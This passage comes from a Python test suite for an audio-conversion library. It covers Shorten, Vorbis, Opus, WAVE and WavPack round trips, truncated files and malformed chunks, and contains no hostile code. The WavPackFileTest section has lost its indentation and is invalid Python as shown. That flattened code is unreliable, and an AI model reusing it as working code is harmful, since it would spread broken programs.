                                      decoder.pcm_split)
                    #a fresh decoder, since the first one has now failed
                    decoder = audiotools.decoders.SHNDecoder(temp.name)
                    self.assertNotEqual(decoder, None)
                    self.assertRaises(IOError,
                                      audiotools.transfer_framelist_data,
                                      decoder, lambda x: x)
            finally:
                temp.close()
        #test running convert() on a truncated file
        #triggers EncodingError
        temp = tempfile.NamedTemporaryFile(suffix=".shn")
        try:
            temp.write(open("shorten-frames.shn", "rb").read()[0:-10])
            temp.flush()
            #NOTE(review): the local is named "flac" but holds a
            #Shorten track - likely copy-paste from the FLAC tests
            flac = audiotools.open(temp.name)
            if (os.path.isfile("dummy.wav")):
                os.unlink("dummy.wav")
            self.assertEqual(os.path.isfile("dummy.wav"), False)
            self.assertRaises(audiotools.EncodingError,
                              flac.convert,
                              "dummy.wav",
                              audiotools.WaveAudio)
            self.assertEqual(os.path.isfile("dummy.wav"), False)
        finally:
            temp.close()

    def __stream_variations__(self):
        """yield fresh test PCM streams covering 8/16 bits-per-sample,
        several sample rates and channel layouts"""

        for stream in [
            test_streams.Sine8_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
            test_streams.Sine8_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
            test_streams.Sine8_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
            test_streams.Sine8_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
            test_streams.Sine8_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
            test_streams.Sine8_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
            test_streams.Sine8_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
            test_streams.Sine8_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
            test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
            test_streams.Sine8_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
            test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
            test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
            test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
            test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
            test_streams.Sine8_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
            test_streams.Sine16_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
            test_streams.Sine16_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
            test_streams.Sine16_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
            test_streams.Sine16_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
            test_streams.Sine16_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
            test_streams.Sine16_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
            test_streams.Sine16_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
            test_streams.Sine16_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
            test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
            test_streams.Sine16_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
            test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
            test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
            test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
            test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
            test_streams.Sine16_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
            test_streams.Simple_Sine(200000, 44100, 0x7, 8,
                                     (25, 10000),
                                     (50, 20000),
                                     (120, 30000)),
            test_streams.Simple_Sine(200000, 44100, 0x33, 8,
                                     (25, 10000),
                                     (50, 20000),
                                     (75, 30000),
                                     (65, 40000)),
            test_streams.Simple_Sine(200000, 44100, 0x37, 8,
                                     (25, 10000),
                                     (35, 15000),
                                     (45, 20000),
                                     (50, 25000),
                                     (55, 30000)),
            test_streams.Simple_Sine(200000, 44100, 0x3F, 8,
                                     (25, 10000),
                                     (45, 15000),
                                     (65, 20000),
                                     (85, 25000),
                                     (105, 30000),
                                     (120, 35000)),
            test_streams.Simple_Sine(200000, 44100, 0x7, 16,
                                     (6400, 10000),
                                     (12800, 20000),
                                     (30720, 30000)),
            test_streams.Simple_Sine(200000, 44100, 0x33, 16,
                                     (6400, 10000),
                                     (12800, 20000),
                                     (19200, 30000),
                                     (16640, 40000)),
            test_streams.Simple_Sine(200000, 44100, 0x37, 16,
                                     (6400, 10000),
                                     (8960, 15000),
                                     (11520, 20000),
                                     (12800, 25000),
                                     (14080, 30000)),
            test_streams.Simple_Sine(200000, 44100, 0x3F, 16,
                                     (6400, 10000),
                                     (11520, 15000),
                                     (16640, 20000),
                                     (21760, 25000),
                                     (26880, 30000),
                                     (30720, 35000))]:
            yield stream

    @FORMAT_SHORTEN
    def test_streams(self):
        """each variation stream should match its own MD5 digest"""

        for g in self.__stream_variations__():
            md5sum = md5()
            f = g.read(audiotools.FRAMELIST_SIZE)
            while (len(f) > 0):
                md5sum.update(f.to_bytes(False, True))
                f = g.read(audiotools.FRAMELIST_SIZE)
            self.assertEqual(md5sum.digest(), g.digest())
            g.close()

    def __test_reader__(self, pcmreader, **encode_options):
        """encode pcmreader to Shorten through wave and aiff containers
        and verify the results against the reference shorten(1) binary"""

        if (not audiotools.BIN.can_execute(audiotools.BIN["shorten"])):
            self.assert_(False,
                         "reference Shorten binary shorten(1) required for this test")
        temp_file = tempfile.NamedTemporaryFile(suffix=".shn")
        #construct a temporary wave file from pcmreader
        temp_input_wave_file = tempfile.NamedTemporaryFile(suffix=".wav")
        temp_input_wave = audiotools.WaveAudio.from_pcm(
            temp_input_wave_file.name, pcmreader)
        temp_input_wave.verify()
        options = encode_options.copy()
        (head, tail) = temp_input_wave.wave_header_footer()
        options["is_big_endian"] = False
        options["signed_samples"] = (pcmreader.bits_per_sample == 16)
        options["header_data"] = head
        if (len(tail) > 0):
            options["footer_data"] = tail
        self.encode(temp_file.name,
                    temp_input_wave.to_pcm(),
                    **options)
        shn = audiotools.open(temp_file.name)
        self.assert_(shn.total_frames() > 0)
        temp_wav_file1 = tempfile.NamedTemporaryFile(suffix=".wav")
        temp_wav_file2 = tempfile.NamedTemporaryFile(suffix=".wav")
        #first, ensure the Shorten-encoded file
        #has the same MD5 signature as pcmreader once decoded
        md5sum = md5()
        d = self.decoder(temp_file.name)
        f = d.read(audiotools.FRAMELIST_SIZE)
        while (len(f) > 0):
            md5sum.update(f.to_bytes(False, True))
            f = d.read(audiotools.FRAMELIST_SIZE)
        d.close()
        self.assertEqual(md5sum.digest(), pcmreader.digest())
        #then compare our .to_wave() output
        #with that of the Shorten reference decoder
        shn.convert(temp_wav_file1.name, audiotools.WaveAudio)
        subprocess.call([audiotools.BIN["shorten"],
                         "-x", shn.filename, temp_wav_file2.name])
        wave = audiotools.WaveAudio(temp_wav_file1.name)
        wave.verify()
        wave = audiotools.WaveAudio(temp_wav_file2.name)
        wave.verify()
        self.assertEqual(audiotools.pcm_frame_cmp(
            audiotools.WaveAudio(temp_wav_file1.name).to_pcm(),
            audiotools.WaveAudio(temp_wav_file2.name).to_pcm()),
            None)
        temp_file.close()
        temp_wav_file1.close()
        temp_wav_file2.close()
        #then perform PCM -> aiff -> Shorten -> PCM testing
        #construct a temporary wave file from pcmreader
        temp_input_aiff_file = tempfile.NamedTemporaryFile(suffix=".aiff")
        temp_input_aiff = temp_input_wave.convert(temp_input_aiff_file.name,
                                                  audiotools.AiffAudio)
        temp_input_aiff.verify()
        options = encode_options.copy()
        options["is_big_endian"] = True
        options["signed_samples"] = True
        (head, tail) = temp_input_aiff.aiff_header_footer()
        options["header_data"] = head
        if (len(tail) > 0):
            options["footer_data"] = tail
        self.encode(temp_file.name,
                    temp_input_aiff.to_pcm(),
                    **options)
        shn = audiotools.open(temp_file.name)
        self.assert_(shn.total_frames() > 0)
        temp_aiff_file1 = tempfile.NamedTemporaryFile(suffix=".aiff")
        temp_aiff_file2 = tempfile.NamedTemporaryFile(suffix=".aiff")
        #first, ensure the Shorten-encoded file
        #has the same MD5 signature as pcmreader once decoded
        #NOTE(review): reads in BUFFER_SIZE units here but
        #FRAMELIST_SIZE above - confirm the difference is intentional
        md5sum = md5()
        d = self.decoder(temp_file.name)
        f = d.read(audiotools.BUFFER_SIZE)
        while (len(f) > 0):
            md5sum.update(f.to_bytes(False, True))
            f = d.read(audiotools.BUFFER_SIZE)
        d.close()
        self.assertEqual(md5sum.digest(), pcmreader.digest())
        #then compare our .to_aiff() output
        #with that of the Shorten reference decoder
        shn.convert(temp_aiff_file1.name, audiotools.AiffAudio)
        subprocess.call([audiotools.BIN["shorten"],
                         "-x", shn.filename, temp_aiff_file2.name])
        aiff = audiotools.AiffAudio(temp_aiff_file1.name)
        aiff.verify()
        aiff = audiotools.AiffAudio(temp_aiff_file2.name)
        aiff.verify()
        self.assertEqual(audiotools.pcm_frame_cmp(
            audiotools.AiffAudio(temp_aiff_file1.name).to_pcm(),
            audiotools.AiffAudio(temp_aiff_file2.name).to_pcm()),
            None)
        temp_file.close()
        temp_input_aiff_file.close()
        temp_input_wave_file.close()
        temp_aiff_file1.close()
        temp_aiff_file2.close()

    @FORMAT_SHORTEN
    def test_small_files(self):
        """tiny generated streams should survive a round trip"""

        for g in [test_streams.Generate01,
                  test_streams.Generate02,
                  test_streams.Generate03,
                  test_streams.Generate04]:
            gen = g(44100)
            self.__test_reader__(gen, block_size=256)

    @FORMAT_SHORTEN
    def test_full_scale_deflection(self):
        """full-scale sample patterns shouldn't break the codec"""

        for (bps, fsd) in [(8, test_streams.fsd8),
                           (16, test_streams.fsd16)]:
            for pattern in [test_streams.PATTERN01,
                            test_streams.PATTERN02,
                            test_streams.PATTERN03,
                            test_streams.PATTERN04,
                            test_streams.PATTERN05,
                            test_streams.PATTERN06,
                            test_streams.PATTERN07]:
                stream = test_streams.MD5Reader(fsd(pattern, 100))
                self.__test_reader__(
                    stream, block_size=256)

    @FORMAT_SHORTEN
    def test_sines(self):
        """all the sine stream variations should survive a round trip"""

        for g in self.__stream_variations__():
            self.__test_reader__(g, block_size=256)

    @FORMAT_SHORTEN
    def test_blocksizes(self):
        """a range of block sizes should all produce valid files"""

        noise = struct.unpack(">32h", os.urandom(64))
        for block_size in [4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,
                           256, 1024]:
            args = {"block_size": block_size}
            self.__test_reader__(test_streams.MD5Reader(
                test_streams.FrameListReader(noise, 44100, 1, 16)), **args)

    @FORMAT_SHORTEN
    def test_noise(self):
        """random noise should round-trip at each channel/bps combination"""

        for opts in self.encode_opts:
            encode_opts = opts.copy()
            for (channels, mask) in [
                (1, audiotools.ChannelMask.from_channels(1)),
                (2, audiotools.ChannelMask.from_channels(2)),
                (4, audiotools.ChannelMask.from_fields(
                    front_left=True,
                    front_right=True,
                    back_left=True,
                    back_right=True)),
                (8, audiotools.ChannelMask(0))]:
                for bps in [8, 16]:
                    self.__test_reader__(
                        MD5_Reader(EXACT_RANDOM_PCM_Reader(
                            pcm_frames=65536,
                            sample_rate=44100,
                            channels=channels,
                            channel_mask=mask,
                            bits_per_sample=bps)),
                        **encode_opts)

    @FORMAT_SHORTEN
    def test_python_codec(self):
        """the pure-Python encoder's output should decode identically
        in both the C and pure-Python decoders"""

        def test_python_reader(pcmreader, block_size=256):
            #encode with the pure-Python encoder, then confirm
            #both decoders produce identical PCM output
            from audiotools.py_encoders import encode_shn
            temp_file = tempfile.NamedTemporaryFile(suffix=".shn")
            audiotools.ShortenAudio.from_pcm(
                temp_file.name,
                pcmreader,
                block_size=block_size,
                encoding_function=encode_shn)
            from audiotools.decoders import SHNDecoder as SHNDecoder1
            from audiotools.py_decoders import SHNDecoder as SHNDecoder2
            self.assertEqual(audiotools.pcm_frame_cmp(
                SHNDecoder1(temp_file.name),
                SHNDecoder2(temp_file.name)), None)
            temp_file.close()
        #test small files
        for g in [test_streams.Generate01,
                  test_streams.Generate02,
                  test_streams.Generate03,
                  test_streams.Generate04]:
            gen = g(44100)
            test_python_reader(gen, block_size=256)
        #test full scale deflection
        for (bps, fsd) in [(8, test_streams.fsd8),
                           (16, test_streams.fsd16)]:
            for pattern in [test_streams.PATTERN01,
                            test_streams.PATTERN02,
                            test_streams.PATTERN03,
                            test_streams.PATTERN04,
                            test_streams.PATTERN05,
                            test_streams.PATTERN06,
                            test_streams.PATTERN07]:
                stream = test_streams.MD5Reader(fsd(pattern, 100))
                test_python_reader(stream, block_size=256)
        #test sines
        for g in [test_streams.Sine8_Mono(5000, 48000,
                                          441.0, 0.50, 441.0, 0.49),
                  test_streams.Sine8_Stereo(5000, 48000,
                                            441.0, 0.50, 441.0, 0.49, 1.0),
                  test_streams.Sine16_Mono(5000, 48000,
                                           441.0, 0.50, 441.0, 0.49),
                  test_streams.Sine16_Stereo(5000, 48000,
                                             441.0, 0.50, 441.0, 0.49, 1.0),
                  test_streams.Simple_Sine(5000, 44100, 0x7, 8,
                                           (25, 10000),
                                           (50, 20000),
                                           (120, 30000)),
                  test_streams.Simple_Sine(5000, 44100, 0x33, 8,
                                           (25, 10000),
                                           (50, 20000),
                                           (75, 30000),
                                           (65, 40000)),
                  test_streams.Simple_Sine(5000, 44100, 0x37, 8,
                                           (25, 10000),
                                           (35, 15000),
                                           (45, 20000),
                                           (50, 25000),
                                           (55, 30000)),
                  test_streams.Simple_Sine(5000, 44100, 0x3F, 8,
                                           (25, 10000),
                                           (45, 15000),
                                           (65, 20000),
                                           (85, 25000),
                                           (105, 30000),
                                           (120, 35000)),
                  test_streams.Simple_Sine(5000, 44100, 0x7, 16,
                                           (6400, 10000),
                                           (12800, 20000),
                                           (30720, 30000)),
                  test_streams.Simple_Sine(5000, 44100, 0x33, 16,
                                           (6400, 10000),
                                           (12800, 20000),
                                           (19200, 30000),
                                           (16640, 40000)),
                  test_streams.Simple_Sine(5000, 44100, 0x37, 16,
                                           (6400, 10000),
                                           (8960, 15000),
                                           (11520, 20000),
                                           (12800, 25000),
                                           (14080, 30000)),
                  test_streams.Simple_Sine(5000, 44100, 0x3F, 16,
                                           (6400, 10000),
                                           (11520, 15000),
                                           (16640, 20000),
                                           (21760, 25000),
                                           (26880, 30000),
                                           (30720, 35000))]:
            test_python_reader(g, block_size=256)
        #test block sizes
        noise = struct.unpack(">32h", os.urandom(64))
        for block_size in [4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,
                           256, 1024]:
            test_python_reader(
                test_streams.FrameListReader(noise, 44100, 1, 16),
                block_size=block_size)
        #test noise
        for block_size in [4, 256, 1024]:
            for (channels, mask) in [
                (1, audiotools.ChannelMask.from_channels(1)),
                (2, audiotools.ChannelMask.from_channels(2)),
                (4, audiotools.ChannelMask.from_fields(
                    front_left=True,
                    front_right=True,
                    back_left=True,
                    back_right=True)),
                (8, audiotools.ChannelMask(0))]:
                for bps in [8, 16]:
                    test_python_reader(
                        EXACT_RANDOM_PCM_Reader(
                            pcm_frames=5000,
                            sample_rate=44100,
                            channels=channels,
                            channel_mask=mask,
                            bits_per_sample=bps),
                        block_size=block_size)
class VorbisFileTest(OggVerify, LossyFileTest):
    """tests for the Ogg Vorbis format"""

    def setUp(self):
        self.audio_class = audiotools.VorbisAudio
        self.suffix = "." + self.audio_class.SUFFIX

    @FORMAT_VORBIS
    def test_channels(self):
        """channel counts from 1 through 6 should be preserved"""

        if (self.audio_class is audiotools.AudioFile):
            return
        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            for channel_count in xrange(1, 7):
                fresh = self.audio_class.from_pcm(
                    temp.name,
                    BLANK_PCM_Reader(1,
                                     channels=channel_count,
                                     channel_mask=0))
                self.assertEqual(fresh.channels(), channel_count)
                reopened = audiotools.open(temp.name)
                self.assertEqual(reopened.channels(), channel_count)
        finally:
            temp.close()

    @FORMAT_VORBIS
    def test_big_comment(self):
        """an oversized metadata comment shouldn't damage the stream"""

        track_file = tempfile.NamedTemporaryFile(
            suffix="." + self.audio_class.SUFFIX)
        try:
            track = self.audio_class.from_pcm(track_file.name,
                                              BLANK_PCM_Reader(1))

            def stream_digest(reader):
                #consume a PCMReader and return its MD5 digest
                checksum = md5()
                audiotools.transfer_framelist_data(reader, checksum.update)
                reader.close()
                return checksum.hexdigest()

            original_digest = stream_digest(track.to_pcm())
            comment = audiotools.MetaData(
                track_name=u"Name",
                track_number=1,
                comment=u"abcdefghij" * 13005)
            track.set_metadata(comment)
            track = audiotools.open(track_file.name)
            self.assertEqual(comment, track.get_metadata())
            self.assertEqual(original_digest, stream_digest(track.to_pcm()))
        finally:
            track_file.close()

    @FORMAT_AUDIOFILE
    def test_replay_gain(self):
        #ReplayGain is delegated to the external vorbisgain tool,
        #so there's nothing to exercise directly here.
        #FIXME - fold libvorbis into the tools directly
        #and handle gain calculation/application as floats end-to-end,
        #which would eliminate the vorbisgain requirement.
        self.assert_(True)
class OpusFileTest(OggVerify, LossyFileTest):
    """tests for the Opus format"""

    def setUp(self):
        self.audio_class = audiotools.OpusAudio
        self.suffix = "." + self.audio_class.SUFFIX

    @FORMAT_OPUS
    def test_channels(self):
        #FIXME - test Opus channel assignment
        pass

    @FORMAT_OPUS
    def test_big_comment(self):
        """an oversized metadata comment shouldn't damage the stream"""

        track_file = tempfile.NamedTemporaryFile(
            suffix="." + self.audio_class.SUFFIX)
        try:
            track = self.audio_class.from_pcm(track_file.name,
                                              BLANK_PCM_Reader(1))

            def stream_digest(reader):
                #consume a PCMReader and return its MD5 digest
                checksum = md5()
                audiotools.transfer_framelist_data(reader, checksum.update)
                reader.close()
                return checksum.hexdigest()

            original_digest = stream_digest(track.to_pcm())
            comment = audiotools.MetaData(
                track_name=u"Name",
                track_number=1,
                comment=u"abcdefghij" * 13005)
            track.set_metadata(comment)
            track = audiotools.open(track_file.name)
            self.assertEqual(comment, track.get_metadata())
            self.assertEqual(original_digest, stream_digest(track.to_pcm()))
        finally:
            track_file.close()
class WaveFileTest(TestForeignWaveChunks,
                   LosslessFileTest):
    """tests for the RIFF WAVE format"""

    def setUp(self):
        self.audio_class = audiotools.WaveAudio
        self.suffix = "." + self.audio_class.SUFFIX

    @FORMAT_WAVE
    def test_verify(self):
        """malformed wave files should fail verify() or init"""

        #test various truncated files with verify()
        for wav_file in ["wav-8bit.wav",
                         "wav-1ch.wav",
                         "wav-2ch.wav",
                         "wav-6ch.wav"]:
            temp = tempfile.NamedTemporaryFile(suffix=".wav")
            try:
                wav_data = open(wav_file, 'rb').read()
                temp.write(wav_data)
                temp.flush()
                wave = audiotools.open(temp.name)
                #try changing the file out from under it
                for i in xrange(0, len(wav_data)):
                    f = open(temp.name, 'wb')
                    f.write(wav_data[0:i])
                    f.close()
                    self.assertEqual(os.path.getsize(temp.name), i)
                    self.assertRaises(audiotools.InvalidFile,
                                      wave.verify)
            finally:
                temp.close()
        #test running convert() on a truncated file
        #triggers EncodingError
        #FIXME - truncate file underfoot
        # temp = tempfile.NamedTemporaryFile(suffix=".flac")
        # try:
        #     temp.write(open("wav-2ch.wav", "rb").read()[0:-10])
        #     temp.flush()
        #     flac = audiotools.open(temp.name)
        #     if (os.path.isfile("dummy.wav")):
        #         os.unlink("dummy.wav")
        #     self.assertEqual(os.path.isfile("dummy.wav"), False)
        #     self.assertRaises(audiotools.EncodingError,
        #                       flac.convert,
        #                       "dummy.wav",
        #                       audiotools.WaveAudio)
        #     self.assertEqual(os.path.isfile("dummy.wav"), False)
        # finally:
        #     temp.close()
        #test other truncated file combinations
        #fmt_size is the byte size of each file's fmt chunk
        for (fmt_size, wav_file) in [(0x24, "wav-8bit.wav"),
                                     (0x24, "wav-1ch.wav"),
                                     (0x24, "wav-2ch.wav"),
                                     (0x3C, "wav-6ch.wav")]:
            f = open(wav_file, 'rb')
            wav_data = f.read()
            f.close()
            temp = tempfile.NamedTemporaryFile(suffix=".wav")
            try:
                #first, check that a truncated fmt chunk raises an exception
                #at init-time
                for i in xrange(0, fmt_size + 8):
                    temp.seek(0, 0)
                    temp.write(wav_data[0:i])
                    temp.flush()
                    self.assertEqual(os.path.getsize(temp.name), i)
                    self.assertRaises(audiotools.InvalidFile,
                                      audiotools.WaveAudio,
                                      temp.name)
            finally:
                temp.close()
        #test for non-ASCII chunk IDs
        #NOTE(review): "pack" is imported here but never used - candidate
        #for removal
        from struct import pack
        chunks = list(audiotools.open("wav-2ch.wav").chunks()) + \
            [audiotools.wav.RIFF_Chunk("fooz", 10, chr(0) * 10)]
        temp = tempfile.NamedTemporaryFile(suffix=".wav")
        try:
            audiotools.WaveAudio.wave_from_chunks(temp.name,
                                                  iter(chunks))
            f = open(temp.name, 'rb')
            wav_data = list(f.read())
            f.close()
            #zero a byte inside the appended chunk's ID
            #to make it non-ASCII
            wav_data[-15] = chr(0)
            temp.seek(0, 0)
            temp.write("".join(wav_data))
            temp.flush()
            self.assertRaises(audiotools.InvalidFile,
                              audiotools.open(temp.name).verify)
        finally:
            temp.close()
        #canned fmt and data chunks used to build
        #structurally broken wave files below
        FMT = audiotools.wav.RIFF_Chunk(
            "fmt ",
            16,
            '\x01\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00')
        DATA = audiotools.wav.RIFF_Chunk(
            "data",
            26,
            '\x00\x00\x01\x00\x02\x00\x03\x00\x02\x00\x01\x00\x00\x00\xff\xff\xfe\xff\xfd\xff\xfe\xff\xff\xff\x00\x00')
        #test multiple fmt chunks
        temp = tempfile.NamedTemporaryFile(suffix=".wav")
        try:
            for chunks in [[FMT, FMT, DATA],
                           [FMT, DATA, FMT]]:
                audiotools.WaveAudio.wave_from_chunks(temp.name, chunks)
                self.assertRaises(
                    audiotools.InvalidFile,
                    audiotools.open(temp.name).verify)
        finally:
            temp.close()
        #test multiple data chunks
        temp = tempfile.NamedTemporaryFile(suffix=".wav")
        try:
            audiotools.WaveAudio.wave_from_chunks(temp.name, [FMT, DATA, DATA])
            self.assertRaises(
                audiotools.InvalidFile,
                audiotools.open(temp.name).verify)
        finally:
            temp.close()
        #test data chunk before fmt chunk
        temp = tempfile.NamedTemporaryFile(suffix=".wav")
        try:
            audiotools.WaveAudio.wave_from_chunks(temp.name, [DATA, FMT])
            self.assertRaises(
                audiotools.InvalidFile,
                audiotools.open(temp.name).verify)
        finally:
            temp.close()
        #test no fmt chunk
        temp = tempfile.NamedTemporaryFile(suffix=".wav")
        try:
            audiotools.WaveAudio.wave_from_chunks(temp.name, [DATA])
            self.assertRaises(
                audiotools.InvalidFile,
                audiotools.open(temp.name).verify)
        finally:
            temp.close()
        #test no data chunk
        temp = tempfile.NamedTemporaryFile(suffix=".wav")
        try:
            audiotools.WaveAudio.wave_from_chunks(temp.name, [FMT])
            self.assertRaises(
                audiotools.InvalidFile,
                audiotools.open(temp.name).verify)
        finally:
            temp.close()

    @FORMAT_WAVE
    def test_clean(self):
        """clean() should reduce broken chunk layouts
        to one fmt chunk followed by one data chunk"""

        FMT = audiotools.wav.RIFF_Chunk(
            "fmt ",
            16,
            '\x01\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00')
        DATA = audiotools.wav.RIFF_Chunk(
            "data",
            26,
            '\x00\x00\x01\x00\x02\x00\x03\x00\x02\x00\x01\x00\x00\x00\xff\xff\xfe\xff\xfd\xff\xfe\xff\xff\xff\x00\x00')
        #test multiple fmt chunks
        #test multiple data chunks
        #test data chunk before fmt chunk
        temp = tempfile.NamedTemporaryFile(suffix=".wav")
        fixed = tempfile.NamedTemporaryFile(suffix=".wav")
        try:
            for chunks in [[FMT, FMT, DATA],
                           [FMT, DATA, FMT],
                           [FMT, DATA, DATA],
                           [DATA, FMT],
                           [DATA, FMT, FMT]]:
                audiotools.WaveAudio.wave_from_chunks(temp.name, chunks)
                fixes = []
                wave = audiotools.open(temp.name).clean(fixes, fixed.name)
                chunks = list(wave.chunks())
                self.assertEquals([c.id for c in chunks],
                                  [c.id for c in [FMT, DATA]])
                self.assertEquals([c.__size__ for c in chunks],
                                  [c.__size__ for c in [FMT, DATA]])
                self.assertEquals([c.__data__ for c in chunks],
                                  [c.__data__ for c in [FMT, DATA]])
        finally:
            temp.close()
            fixed.close()
        #test converting 24bps file to WAVEFORMATEXTENSIBLE
        #FIXME
class WavPackFileTest(TestForeignWaveChunks,
LosslessFileTest):
def setUp(self):
self.audio_class = audiotools.WavPackAudio
self.suffix = "." + self.audio_class.SUFFIX
from audiotools.decoders import WavPackDecoder
from audiotools.encoders import encode_wavpack
self.decoder = WavPackDecoder
self.encode = encode_wavpack
self.encode_opts = [{"block_size": 44100,
"false_stereo": True,
"wasted_bits": True,
"joint_stereo": False,
"correlation_passes": 0},
{"block_size": 44100,
"false_stereo": True,
"wasted_bits": True,
"joint_stereo": True,
"correlation_passes": 0},
{"block_size": 44100,
"false_stereo": True,
"wasted_bits": True,
"joint_stereo": True,
"correlation_passes": 1},
{"block_size": 44100,
"false_stereo": True,
"wasted_bits": True,
"joint_stereo": True,
"correlation_passes": 2},
{"block_size": 44100,
"false_stereo": True,
"wasted_bits": True,
"joint_stereo": True,
"correlation_passes": 5},
{"block_size": 44100,
"false_stereo": True,
"wasted_bits": True,
"joint_stereo": True,
"correlation_passes": 10},
{"block_size": 44100,
"false_stereo": True,
"wasted_bits": True,
"joint_stereo": True,
"correlation_passes": 16}]
@FORMAT_WAVPACK
def test_init(self):
#check missing file
self.assertRaises(audiotools.wavpack.InvalidWavPack,
audiotools.WavPackAudio,
"/dev/null/foo")
#check invalid file
invalid_file = tempfile.NamedTemporaryFile(suffix=".wv")
try:
for c in "invalidstringxxx":
invalid_file.write(c)
invalid_file.flush()
self.assertRaises(audiotools.wavpack.InvalidWavPack,
audiotools.WavPackAudio,
invalid_file.name)
finally:
invalid_file.close()
#check some decoder errors,
#mostly to ensure a failed init doesn't make Python explode
self.assertRaises(TypeError, self.decoder)
self.assertRaises(TypeError, self.decoder, None)
self.assertRaises(IOError, self.decoder, "/dev/null/foo")
self.assertRaises(IOError, self.decoder, "/dev/null", sample_rate=-1)
@FORMAT_WAVPACK
def test_verify(self):
#test truncating a WavPack file causes verify()
#to raise InvalidFile as necessary
wavpackdata = open("wavpack-combo.wv", "rb").read()
temp = tempfile.NamedTemporaryFile(
suffix="." + self.audio_class.SUFFIX)
try:
self.assertEqual(audiotools.open("wavpack-combo.wv").verify(),
True)
temp.write(wavpackdata)
temp.flush()
test_wavpack = audiotools.open(temp.name)
for i in xrange(0, 0x20B):
f = open(temp.name, "wb")
f.write(wavpackdata[0:i])
f.close()
self.assertEqual(os.path.getsize(temp.name), i)
self.assertRaises(audiotools.InvalidFile,
test_wavpack.verify)
#Swapping random bits doesn't affect WavPack's decoding
#in many instances - which is surprising since I'd
#expect its adaptive routines to be more susceptible
#to values being out-of-whack during decorrelation.
#This resilience may be related to its hybrid mode,
#but it doesn't inspire confidence.
finally:
temp.close()
#test truncating a WavPack file causes the WavPackDecoder
#to raise IOError as necessary
from audiotools.decoders import WavPackDecoder
f = open("silence.wv")
wavpack_data = f.read()
f.close()
temp = tempfile.NamedTemporaryFile(suffix=".wv")
try:
for i in xrange(0, len(wavpack_data)):
temp.seek(0, 0)
temp.write(wavpack_data[0:i])
temp.flush()
self.assertEqual(os.path.getsize(temp.name), i)
try:
decoder = WavPackDecoder(temp.name)
except IOError:
#chopping off the first few bytes might trigger
#an IOError at init-time, which is ok
continue
self.assertNotEqual(decoder, None)
decoder = WavPackDecoder(temp.name)
self.assertNotEqual(decoder, None)
self.assertRaises(IOError,
audiotools.transfer_framelist_data,
decoder, lambda f: f)
finally:
temp.close()
#test a truncated WavPack file's convert() method
#generates EncodingErrors
temp = tempfile.NamedTemporaryFile(
suffix="." + self.audio_class.SUFFIX)
try:
temp.write(open("wavpack-combo.wv", "rb").read())
temp.flush()
wavpack = audiotools.open(temp.name)
f = open(temp.name, "wb")
f.write(open("wavpack-combo.wv", "rb").read()[0:-0x20B])
f.close()
if (os.path.isfile("dummy.wav")):
os.unlink("dummy.wav")
self.assertEqual(os.path.isfile("dummy.wav"), False)
self.assertRaises(audiotools.EncodingError,
wavpack.convert,
"dummy.wav",
audiotools.WaveAudio)
self.assertEqual(os.path.isfile("dummy.wav"), False)
finally:
temp.close()
    def __stream_variations__(self):
        """yield fresh test PCM streams covering 8/16/24 bits-per-sample,
        several sample rates and channel layouts"""

        for stream in [
            test_streams.Sine8_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
            test_streams.Sine8_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
            test_streams.Sine8_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
            test_streams.Sine8_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
            test_streams.Sine8_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
            test_streams.Sine8_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
            test_streams.Sine8_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
            test_streams.Sine8_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
            test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
            test_streams.Sine8_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
